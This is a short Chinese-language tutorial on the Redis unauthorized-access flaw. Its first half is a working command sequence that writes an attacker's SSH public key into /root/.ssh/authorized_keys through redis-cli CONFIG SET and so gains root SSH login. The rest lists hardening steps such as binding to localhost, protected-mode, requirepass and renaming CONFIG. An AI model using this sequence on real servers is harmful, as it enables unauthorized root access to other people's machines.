redis 未授權訪問漏洞和防範
通過nmap掃描開放redis 6379端口
本機安裝redis客戶端,能連接遠端redis數據庫;(redis-cli)
本機創建私鑰和公鑰,ssh-keygen -t rsa 一路回車;會在/root/.ssh/下生成私鑰文件id_rsa和公鑰id_rsa.pub
redis-cli -h 192.168.3.14 鏈接遠程redis數據庫
[root@hack bin]# ./redis-cli -h 192.168.3.14
192.168.3.14:6379> keys *
1) "xxxx"
192.168.3.14:6379> config set dir /root/.ssh/
192.168.3.14:6379> config set dbfilename authorized_keys
192.168.3.14:6379> set xxxx "\n\n\n 拷貝公鑰文件內容(id_rsa.pub)\n\n\n"
192.168.3.14:6379> save
ssh [email protected]——發現可以直接登錄了;
防範建議:
redis4.0默認的redis.conf文件把6379默認綁定在127.0.0.1;這裏設置允許誰能訪問我的redis,不要開放0.0.0.0所有訪問;
redis4.0 的redis.conf裏的protected-mode設置成yes;
對redis啟用密碼認證 requirepass foobared
限制ssh登錄
設置redis rename config
redis 未授權訪問漏洞和防範